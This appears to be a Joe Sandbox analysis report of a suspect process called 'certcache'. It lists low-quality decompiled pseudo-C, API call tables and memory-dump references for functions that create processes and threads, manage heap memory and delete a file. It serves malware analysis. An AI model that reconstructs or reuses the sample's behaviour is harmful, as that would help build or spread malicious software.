Function 001A9990, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
process

C-Code - Quality: 25%

			E001A9990() {
				int _t10;
				void* _t12;

				memset();
				 *(_t12 - 0x88) = 0x44;
				 *((intOrPtr*)(_t12 - 0x5c)) = 0x80;
				_t10 = CreateProcessW(0x1ac7c0, 0, 0, 0, 0, 0, 0, 0, _t12 - 0x88, _t12 - 0x30);
				if(_t10 != 0) {
					CloseHandle( *(_t12 - 0x30));
					_t10 = CloseHandle( *(_t12 - 0x2c));
				}
				goto 0x1b1bae;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				return _t10;
			}

0x001a9990
0x001a9999
0x001a99a6
0x001a99c8
0x001a99d0
0x001a99d5
0x001a99de
0x001a99de
0x001a99e4
0x001a99e9
0x001a99ea
0x001a99eb
0x001a99ec
0x001a99ed
0x001a99ee
0x001a99ef

APIs

memset.NTDLL ref: 001A9990
CreateProcessW.KERNEL32(001AC7C0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001A99C8
CloseHandle.KERNEL32(?), ref: 001A99D5
CloseHandle.KERNEL32(?), ref: 001A99DE

Strings

D, xrefs: 001A9999

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A2447, Relevance: 7.6, APIs: 5, Instructions: 58

APIs

GetProcessHeap.KERNEL32(?,?), ref: 001A2452
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001A2459
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 001A2497
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?), ref: 001A253A
HeapFree.KERNEL32(00000000), ref: 001A2541

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A86C5, Relevance: 7.5, APIs: 6, Instructions: 20

C-Code - Quality: 21%

			E001A86C5(intOrPtr* __edi) {
				void* _t24;
				void* _t26;

				HeapFree(GetProcessHeap(), ??, ??);
				 *0x1ac260( *((intOrPtr*)(_t26 - 0x30)));
				 *0x1ac260( *((intOrPtr*)(_t26 - 0x34)));
				 *0x1ac260( *((intOrPtr*)(_t26 - 0x38)));
				HeapFree(GetProcessHeap(), 0, 0);
				HeapFree(GetProcessHeap(), 0, _t24);
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				return 0 |  *__edi != 0x00000000;
			}

0x001a86cc
0x001a86d5
0x001a86de
0x001a86e7
0x001a86f8
0x001a8708
0x001a871a
0x001a872c
0x001a873f

APIs

GetProcessHeap.KERNEL32 ref: 001A86C5
HeapFree.KERNEL32(00000000), ref: 001A86CC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A86F1
HeapFree.KERNEL32(00000000), ref: 001A86F8
GetProcessHeap.KERNEL32(00000000,?), ref: 001A8701
HeapFree.KERNEL32(00000000), ref: 001A8708

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A259B, Relevance: 6.1, APIs: 4, Instructions: 66

APIs

RtlAllocateHeap.NTDLL ref: 001A25A4
memcpy.NTDLL(?,?), ref: 001A25DE
GetProcessHeap.KERNEL32(00000000), ref: 001A263C
HeapFree.KERNEL32(00000000), ref: 001A2643

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A8A5E, Relevance: 6.1, APIs: 4, Instructions: 60

C-Code - Quality: 35%

			E001A8A5E(void* __ecx, void* __edx, void* __edi, signed char __esi, void* __eflags) {
				void* _t19;
				intOrPtr _t20;
				signed char _t25;
				void* _t27;
				intOrPtr _t31;
				void* _t32;
				void _t34;
				signed char _t35;
				signed char _t38;
				signed int _t43;
				intOrPtr _t46;
				signed char _t47;
				void* _t48;

				L0:
				while(1) {
					L0:
					_t47 = __esi;
					_t45 = __edi;
					_t20 = L001A1F70(_t19, __ecx, __edx);
					 *((intOrPtr*)(__edi + 8)) = _t20;
					if(_t20 == 0) {
						goto L17;
					}
					L11:
					_t31 = _t27 +  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x3c)) + _t27 + 0x28));
					 *((intOrPtr*)(__edi + 0xc)) = _t31;
					if(_t31 == 0) {
						L15:
						goto 0x1b17a5;
						asm("int3");
						asm("int3");
						_push( *((intOrPtr*)(_t45 + 8)));
						L16:
						asm("adc eax, 0x1ac178");
						goto L17;
					} else {
						L12:
						goto 0x1b1789;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("cmpsb");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						L13:
						_t32 = CreateThread();
						 *(__edi + 0x10) = _t32;
						if(_t32 == 0) {
							goto L15;
						} else {
							L14:
							 *((intOrPtr*)(__edi + 4)) =  *((intOrPtr*)(_t48 - 0x18));
							_t34 =  *0x1ac274; // 0x0
							 *__edi = _t34;
							 *0x1ac274 = __edi;
							do {
								L1:
								_t46 =  *((intOrPtr*)(_t48 - 4));
								L2:
								_t43 = 0;
								_t38 = 0;
								 *(_t48 - 8) = 0;
								_t35 = 0x80;
								if(_t47 < _t46) {
									while(1) {
										L3:
										_t35 =  *_t47;
										_t47 = _t47 + 1;
										_t43 = _t43 | (_t35 & 0x7f) << _t38;
										if(_t35 >= 0) {
											break;
										}
										L4:
										_t38 = _t38 + 7;
										if(_t47 < _t46) {
											continue;
										}
										break;
									}
									L5:
									 *(_t48 - 8) = _t43;
								}
								L6:
								_t25 =  !((_t35 & 0x000000ff) >> 7);
								if((_t25 & 0x00000001) != 0) {
									L7:
									_t25 = _t43 + _t47;
									if(_t25 <= _t46) {
										L8:
										 *(_t48 - 0xc) = _t47;
										_t47 = _t25;
										_t25 = L001A8800(_t48 - 0xc, _t48 - 0x18);
										if(_t25 != 0) {
											goto L9;
										}
									}
								}
								L18:
								goto 0x1b17ba;
								asm("int3");
								return _t25;
								L9:
								_t27 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
								_t45 = _t27;
							} while (_t27 == 0);
							goto 0x1b1775;
							asm("int3");
							continue;
						}
					}
					L19:
					L17:
					HeapFree(GetProcessHeap(), 0, _t45);
					goto L1;
				}
			}

0x001a8a5e
0x001a8a5e
0x001a8a5e
0x001a8a5e
0x001a8a5e
0x001a8a5e
0x001a8a63
0x001a8a68
0x00000000
0x00000000
0x001a8a6a
0x001a8a71
0x001a8a73
0x001a8a76
0x001a8aab
0x001a8aab
0x001a8ab0
0x001a8ab1
0x001a8ab2
0x001a8ab4
0x001a8ab6
0x00000000
0x001a8a78
0x001a8a78
0x001a8a78
0x001a8a7d
0x001a8a7e
0x001a8a7f
0x001a8a80
0x001a8a81
0x001a8a82
0x001a8a83
0x001a8a84
0x001a8a85
0x001a8a86
0x001a8a86
0x001a8a8c
0x001a8a91
0x00000000
0x001a8a93
0x001a8a93
0x001a8a96
0x001a8a99
0x001a8a9e
0x001a8aa0
0x001a89e3
0x001a89e3
0x001a89e3
0x001a89e6
0x001a89e6
0x001a89e8
0x001a89ea
0x001a89ed
0x001a89f1
0x001a89f3
0x001a89f3
0x001a89f3
0x001a89f5
0x001a89fe
0x001a8a02
0x00000000
0x00000000
0x001a8a04
0x001a8a04
0x001a8a09
0x00000000
0x00000000
0x00000000
0x001a8a09
0x001a8a0b
0x001a8a0b
0x001a8a0b
0x001a8a0e
0x001a8a14
0x001a8a18
0x001a8a1e
0x001a8a1e
0x001a8a23
0x001a8a29
0x001a8a29
0x001a8a32
0x001a8a34
0x001a8a3b
0x00000000
0x00000000
0x001a8a3b
0x001a8a23
0x001a8ad0
0x001a8ad0
0x001a8ad5
0x001a8ad6
0x001a8a41
0x001a8a4c
0x001a8a52
0x001a8a54
0x001a8a58
0x001a8a5d
0x00000000
0x001a8a5d
0x001a8a91
0x00000000
0x001a8abb
0x001a8ac5
0x00000000
0x001a8ac5

APIs

GetProcessHeap.KERNEL32(00000008,00000014), ref: 001A8A45
RtlAllocateHeap.NTDLL(00000000), ref: 001A8A4C
GetProcessHeap.KERNEL32(00000000), ref: 001A8ABE
HeapFree.KERNEL32(00000000), ref: 001A8AC5

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A8AB4, Relevance: 6.1, APIs: 4, Instructions: 51

C-Code - Quality: 43%

			E001A8AB4(void* __ebx, void* __edi, signed char __esi) {
				signed char _t21;
				intOrPtr _t27;
				intOrPtr _t30;
				void* _t31;
				void _t33;
				signed char _t36;
				signed char _t37;
				signed int _t41;
				intOrPtr _t44;
				void* _t45;
				signed char _t46;
				void* _t47;

				L0:
				while(1) {
					L0:
					_t46 = __esi;
					asm("adc eax, 0x1ac178");
					while(1) {
						L17:
						HeapFree(GetProcessHeap(), 0, _t45);
						while(1) {
							L1:
							_t44 =  *((intOrPtr*)(_t47 - 4));
							L2:
							_t41 = 0;
							_t37 = 0;
							 *(_t47 - 8) = 0;
							_t36 = 0x80;
							if(_t46 < _t44) {
								while(1) {
									L3:
									_t36 =  *_t46;
									_t46 = _t46 + 1;
									_t41 = _t41 | (_t36 & 0x7f) << _t37;
									if(_t36 >= 0) {
										break;
									}
									L4:
									_t37 = _t37 + 7;
									if(_t46 < _t44) {
										continue;
									}
									break;
								}
								L5:
								 *(_t47 - 8) = _t41;
							}
							L6:
							_t21 =  !((_t36 & 0x000000ff) >> 7);
							if((_t21 & 0x00000001) != 0) {
								L7:
								_t21 = _t41 + _t46;
								if(_t21 <= _t44) {
									L8:
									 *(_t47 - 0xc) = _t46;
									_t42 = _t47 - 0x18;
									_t38 = _t47 - 0xc;
									_t46 = _t21;
									_t21 = L001A8800(_t47 - 0xc, _t47 - 0x18);
									if(_t21 != 0) {
										L9:
										_t45 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
										if(_t45 == 0) {
											L1:
											_t44 =  *((intOrPtr*)(_t47 - 4));
											goto L2;
										} else {
											L10:
											goto 0x1b1775;
											asm("int3");
											L11:
											_t27 = L001A1F70(_t23, _t38, _t42);
											 *((intOrPtr*)(_t45 + 8)) = _t27;
											if(_t27 == 0) {
												L17:
												HeapFree(GetProcessHeap(), 0, _t45);
												continue;
											} else {
												L12:
												_t30 = _t27 +  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x3c)) + _t27 + 0x28));
												 *((intOrPtr*)(_t45 + 0xc)) = _t30;
												if(_t30 == 0) {
													L16:
													goto 0x1b17a5;
													asm("int3");
													asm("int3");
													_push( *((intOrPtr*)(_t45 + 8)));
													goto L0;
												} else {
													L13:
													goto 0x1b1789;
													asm("int3");
													asm("int3");
													asm("int3");
													asm("cmpsb");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													L14:
													_t31 = CreateThread();
													 *(_t45 + 0x10) = _t31;
													if(_t31 == 0) {
														goto L16;
													} else {
														L15:
														 *((intOrPtr*)(_t45 + 4)) =  *((intOrPtr*)(_t47 - 0x18));
														_t33 =  *0x1ac274; // 0x0
														 *_t45 = _t33;
														 *0x1ac274 = _t45;
														do {
															goto L1;
														} while (_t45 == 0);
														goto L10;
													}
												}
											}
										}
										L19:
									}
								}
							}
							L18:
							goto 0x1b17ba;
							asm("int3");
							return _t21;
						}
					}
				}
			}

0x001a8ab4
0x001a8ab4
0x001a8ab4
0x001a8ab4
0x001a8ab6
0x001a8abb
0x001a8abb
0x001a8ac5
0x001a89e3
0x001a89e3
0x001a89e3
0x001a89e6
0x001a89e6
0x001a89e8
0x001a89ea
0x001a89ed
0x001a89f1
0x001a89f3
0x001a89f3
0x001a89f3
0x001a89f5
0x001a89fe
0x001a8a02
0x00000000
0x00000000
0x001a8a04
0x001a8a04
0x001a8a09
0x00000000
0x00000000
0x00000000
0x001a8a09
0x001a8a0b
0x001a8a0b
0x001a8a0b
0x001a8a0e
0x001a8a14
0x001a8a18
0x001a8a1e
0x001a8a1e
0x001a8a23
0x001a8a29
0x001a8a29
0x001a8a2c
0x001a8a2f
0x001a8a32
0x001a8a34
0x001a8a3b
0x001a8a41
0x001a8a52
0x001a8a56
0x001a89e3
0x001a89e3
0x00000000
0x001a8a58
0x001a8a58
0x001a8a58
0x001a8a5d
0x001a8a5e
0x001a8a5e
0x001a8a63
0x001a8a68
0x001a8abb
0x001a8ac5
0x00000000
0x001a8a6a
0x001a8a6a
0x001a8a71
0x001a8a73
0x001a8a76
0x001a8aab
0x001a8aab
0x001a8ab0
0x001a8ab1
0x001a8ab2
0x00000000
0x001a8a78
0x001a8a78
0x001a8a78
0x001a8a7d
0x001a8a7e
0x001a8a7f
0x001a8a80
0x001a8a81
0x001a8a82
0x001a8a83
0x001a8a84
0x001a8a85
0x001a8a86
0x001a8a86
0x001a8a8c
0x001a8a91
0x00000000
0x001a8a93
0x001a8a93
0x001a8a96
0x001a8a99
0x001a8a9e
0x001a8aa0
0x001a89e3
0x00000000
0x00000000
0x00000000
0x001a89e3
0x001a8a91
0x001a8a76
0x001a8a68
0x00000000
0x001a8a56
0x001a8a3b
0x001a8a23
0x001a8ad0
0x001a8ad0
0x001a8ad5
0x001a8ad6
0x001a8ad6
0x001a89e3
0x001a8abb

APIs

GetProcessHeap.KERNEL32(00000008,00000014), ref: 001A8A45
RtlAllocateHeap.NTDLL(00000000), ref: 001A8A4C
GetProcessHeap.KERNEL32(00000000), ref: 001A8ABE
HeapFree.KERNEL32(00000000), ref: 001A8AC5

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A9370, Relevance: 6.0, APIs: 4, Instructions: 40string

APIs

GetModuleFileNameW.KERNEL32(00000000,001AC9C8,00000104), ref: 001A938C
GetProcessHeap.KERNEL32(00000008,0000015C), ref: 001A93C6
RtlAllocateHeap.NTDLL(00000000), ref: 001A93CD
lstrlen.KERNEL32(?), ref: 001A93F4

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A850C, Relevance: 6.0, APIs: 4, Instructions: 32

C-Code - Quality: 76%

			E001A850C(intOrPtr __ecx, void* __edx, long* __edi) {
				void* _t4;
				void* _t9;
				void* _t17;
				void* _t19;

				_t9 = __edx;
				 *((intOrPtr*)(_t19 - 4)) = __ecx;
				_t4 = RtlAllocateHeap(GetProcessHeap(), 0,  *__edi);
				_t17 = _t4;
				if(_t17 == 0) {
					L4:
					goto 0x1b15de;
					asm("int3");
					return _t4;
				} else {
					_push(_t9);
					_push( *((intOrPtr*)(_t19 - 4)));
					if(L001A2DB0(_t17, __edi) == 0) {
						_t4 = _t17;
						goto L4;
					} else {
						HeapFree(GetProcessHeap(), 0, _t17);
						return 0;
					}
				}
			}

0x001a850c
0x001a850e
0x001a851c
0x001a8522
0x001a8526
0x001a8557
0x001a8557
0x001a855c
0x001a855d
0x001a8528
0x001a8528
0x001a8529
0x001a853a
0x001a8555
0x00000000
0x001a853c
0x001a8546
0x001a8554
0x001a8554
0x001a853a

APIs

GetProcessHeap.KERNEL32(00000000), ref: 001A8515
RtlAllocateHeap.NTDLL(00000000), ref: 001A851C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A853F
HeapFree.KERNEL32(00000000), ref: 001A8546

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001AA7A0, Relevance: 6.0, APIs: 4, Instructions: 31

C-Code - Quality: 100%

			E001AA7A0(long __ecx) {
				int _t3;
				long _t7;
				void* _t9;
				void* _t10;

				_t10 =  *0x1acbd4; // 0x0
				_t7 = __ecx;
				_t9 = 0x1acbd4;
				while(_t10 != 0) {
					_t3 = WaitForSingleObject( *(_t10 + 8), _t7);
					if(_t3 == 0x102) {
						_t9 = _t10;
					} else {
						 *_t9 =  *_t10;
						CloseHandle( *(_t10 + 8));
						_t3 = HeapFree(GetProcessHeap(), 0, _t10);
					}
					_t10 =  *_t9;
				}
				return _t3;
			}

0x001aa7a2
0x001aa7a8
0x001aa7ab
0x001aa7b2
0x001aa7b8
0x001aa7c3
0x001aa7e4
0x001aa7c5
0x001aa7c7
0x001aa7cc
0x001aa7dc
0x001aa7dc
0x001aa7e6
0x001aa7e8
0x001aa7ef

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 001AA7B8
CloseHandle.KERNEL32(?), ref: 001AA7CC
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001A8F95), ref: 001AA7D5
HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001AA7DC

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A198D, Relevance: 6.0, APIs: 4, Instructions: 22

C-Code - Quality: 75%

			E001A198D() {
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t15;

				L001A1830(_t11, _t12);
				_t13 =  *(_t15 - 4);
				 *0x1ac20c(_t15 - 0x20c, 0x104, _t13, 0x1ac7c0, _t13);
				HeapFree(GetProcessHeap(), 0, _t13);
				return DeleteFileW(_t15 - 0x20c);
			}

0x001a198d
0x001a1992
0x001a19a8
0x001a19bb
0x001a19d2

APIs

_snwprintf.NTDLL ref: 001A19A8
GetProcessHeap.KERNEL32(00000000,?), ref: 001A19B4
HeapFree.KERNEL32(00000000), ref: 001A19BB
DeleteFileW.KERNEL32(?), ref: 001A19C8

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A891E, Relevance: 5.0, APIs: 4, Instructions: 23

C-Code - Quality: 73%

			E001A891E(unsigned char* __eax, long __ebx, void* __edi, void* __esi) {
				long _t10;
				long _t12;
				void* _t14;
				void* _t17;

				L0:
				while(1) {
					L0:
					_t14 = __edi;
					_t12 = __ebx;
					 *__eax =  *__eax >> 1;
					 *__eax =  *__eax;
					VirtualFree( *(__esi + 8), 0, ??);
					CloseHandle( *(__esi + 0x10));
					 *__edi =  *__esi;
					_t10 = HeapFree(GetProcessHeap(), 0, __esi);
					while(1) {
						L4:
						_t17 =  *_t14;
						if(_t17 == 0) {
							break;
						}
						L1:
						_t10 = WaitForSingleObject( *(_t17 + 0x10), _t12);
						if(_t10 == 0x102) {
							L3:
							_t14 = _t17;
						} else {
							L2:
							goto 0x1b1734;
							asm("int3");
							asm("int3");
							_push( *((intOrPtr*)(_t17 + 8)));
							goto L0;
						}
					}
					L5:
					return _t10;
					L6:
				}
			}

0x001a891e
0x001a891e
0x001a891e
0x001a891e
0x001a891e
0x001a8920
0x001a8923
0x001a892b
0x001a8934
0x001a893f
0x001a8948
0x001a8952
0x001a8952
0x001a8952
0x001a8956
0x00000000
0x00000000
0x001a8904
0x001a8908
0x001a8913
0x001a8950
0x001a8950
0x001a8915
0x001a8915
0x001a8915
0x001a891a
0x001a891b
0x001a891c
0x00000000
0x001a891c
0x001a8913
0x001a8958
0x001a895b
0x00000000
0x001a895b

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 001A8908
VirtualFree.KERNEL32(?,00000000), ref: 001A892B
CloseHandle.KERNEL32(?), ref: 001A8934
GetProcessHeap.KERNEL32(00000000), ref: 001A8941
HeapFree.KERNEL32(00000000), ref: 001A8948

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A866C, Relevance: 5.0, APIs: 4, Instructions: 22

C-Code - Quality: 35%

			E001A866C(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
				void* _t10;
				void _t28;
				intOrPtr _t31;
				void* _t32;
				void* _t35;
				intOrPtr* _t40;
				void* _t42;
				void* _t44;

				_t40 = __edi;
				_t32 = __ebx;
				if(L001A1E80(_t10, __ecx, __edx) != 0) {
					goto 0x1b168c;
					asm("int3");
					asm("int3");
					if(L001A2560(__edx, _t40) != 0) {
						_t35 =  *(_t44 - 0x10);
						_t28 =  *_t35;
						 *_t32 = _t28;
						if(_t28 < 0x4000000) {
							_push(_t32);
							_t31 = L001A8500(_t35 + 4,  *((intOrPtr*)(_t44 - 0xc)) - 4, _t40);
							_t35 =  *(_t44 - 0x10);
							 *_t40 = _t31;
						}
						HeapFree(GetProcessHeap(), 0, _t35);
					}
					HeapFree(GetProcessHeap(), ??, ??);
				}
				 *0x1ac260( *((intOrPtr*)(_t44 - 0x30)));
				 *0x1ac260( *((intOrPtr*)(_t44 - 0x34)));
				 *0x1ac260( *((intOrPtr*)(_t44 - 0x38)));
				HeapFree(GetProcessHeap(), 0, 0);
				HeapFree(GetProcessHeap(), 0, _t42);
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				return 0 |  *_t40 != 0x00000000;
			}

0x001a866c
0x001a866c
0x001a8676
0x001a8678
0x001a867d
0x001a867e
0x001a8689
0x001a868b
0x001a868e
0x001a8690
0x001a8697
0x001a869f
0x001a86a3
0x001a86a8
0x001a86ae
0x001a86ae
0x001a86ba
0x001a86ba
0x001a86cc
0x001a86cc
0x001a86d5
0x001a86de
0x001a86e7
0x001a86f8
0x001a8708
0x001a871a
0x001a872c
0x001a873f

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A86F1
HeapFree.KERNEL32(00000000), ref: 001A86F8
GetProcessHeap.KERNEL32(00000000,?), ref: 001A8701
HeapFree.KERNEL32(00000000), ref: 001A8708

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A8B2C, Relevance: 5.0, APIs: 4, Instructions: 22

C-Code - Quality: 73%

			E001A8B2C(unsigned char* __eax, void* __ebx, void* __edi, void* __esi) {
				long _t10;
				void* _t13;
				void* _t16;

				L0:
				while(1) {
					L0:
					_t13 = __edi;
					 *__eax =  *__eax >> 1;
					 *__eax =  *__eax;
					VirtualFree( *(__esi + 8), 0, ??);
					CloseHandle( *(__esi + 0x10));
					 *__edi =  *__esi;
					_t10 = HeapFree(GetProcessHeap(), 0, __esi);
					while(1) {
						L4:
						_t16 =  *_t13;
						if(_t16 == 0) {
							break;
						}
						L1:
						_t10 = WaitForSingleObject( *(_t16 + 0x10), 0xffffffff);
						if(_t10 == 0x102) {
							L3:
							_t13 = _t16;
						} else {
							L2:
							goto 0x1b17f6;
							asm("int3");
							asm("int3");
							_push( *((intOrPtr*)(_t16 + 8)));
							goto L0;
						}
					}
					L5:
					return _t10;
					L6:
				}
			}

0x001a8b2c
0x001a8b2c
0x001a8b2c
0x001a8b2c
0x001a8b2e
0x001a8b31
0x001a8b39
0x001a8b42
0x001a8b4d
0x001a8b56
0x001a8b60
0x001a8b60
0x001a8b60
0x001a8b64
0x00000000
0x00000000
0x001a8b11
0x001a8b16
0x001a8b21
0x001a8b5e
0x001a8b5e
0x001a8b23
0x001a8b23
0x001a8b23
0x001a8b28
0x001a8b29
0x001a8b2a
0x00000000
0x001a8b2a
0x001a8b21
0x001a8b66
0x001a8b68
0x00000000
0x001a8b68

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 001A8B16
VirtualFree.KERNEL32(?,00000000), ref: 001A8B39
CloseHandle.KERNEL32(?), ref: 001A8B42
GetProcessHeap.KERNEL32(00000000), ref: 001A8B4F
HeapFree.KERNEL32(00000000), ref: 001A8B56

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A8656, Relevance: 5.0, APIs: 4, Instructions: 20

C-Code - Quality: 22%

			E001A8656(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
				void _t28;
				intOrPtr _t31;
				void* _t32;
				void* _t35;
				void* _t37;
				intOrPtr* _t40;
				void* _t42;
				void* _t44;

				_t40 = __edi;
				_t37 = __edx;
				_t32 = __ebx;
				if(L001A1D40(__ecx) != 0) {
					goto 0x1b1674;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					if(L001A1E80(_t10, __ecx, _t37) != 0) {
						goto 0x1b168c;
						asm("int3");
						asm("int3");
						if(L001A2560(_t37, _t40) != 0) {
							_t35 =  *(_t44 - 0x10);
							_t28 =  *_t35;
							 *_t32 = _t28;
							if(_t28 < 0x4000000) {
								_push(_t32);
								_t31 = L001A8500(_t35 + 4,  *((intOrPtr*)(_t44 - 0xc)) - 4, _t40);
								_t35 =  *(_t44 - 0x10);
								 *_t40 = _t31;
							}
							HeapFree(GetProcessHeap(), 0, _t35);
						}
						HeapFree(GetProcessHeap(), ??, ??);
					}
					 *0x1ac260( *((intOrPtr*)(_t44 - 0x30)));
				}
				 *0x1ac260( *((intOrPtr*)(_t44 - 0x34)));
				 *0x1ac260( *((intOrPtr*)(_t44 - 0x38)));
				HeapFree(GetProcessHeap(), 0, 0);
				HeapFree(GetProcessHeap(), 0, _t42);
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				return 0 |  *_t40 != 0x00000000;
			}

0x001a8656
0x001a8656
0x001a8656
0x001a8660
0x001a8662
0x001a8667
0x001a8668
0x001a8669
0x001a866a
0x001a866b
0x001a8676
0x001a8678
0x001a867d
0x001a867e
0x001a8689
0x001a868b
0x001a868e
0x001a8690
0x001a8697
0x001a869f
0x001a86a3
0x001a86a8
0x001a86ae
0x001a86ae
0x001a86ba
0x001a86ba
0x001a86cc
0x001a86cc
0x001a86d5
0x001a86d5
0x001a86de
0x001a86e7
0x001a86f8
0x001a8708
0x001a871a
0x001a872c
0x001a873f

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A86F1
HeapFree.KERNEL32(00000000), ref: 001A86F8
GetProcessHeap.KERNEL32(00000000,?), ref: 001A8701
HeapFree.KERNEL32(00000000), ref: 001A8708

Memory Dump Source

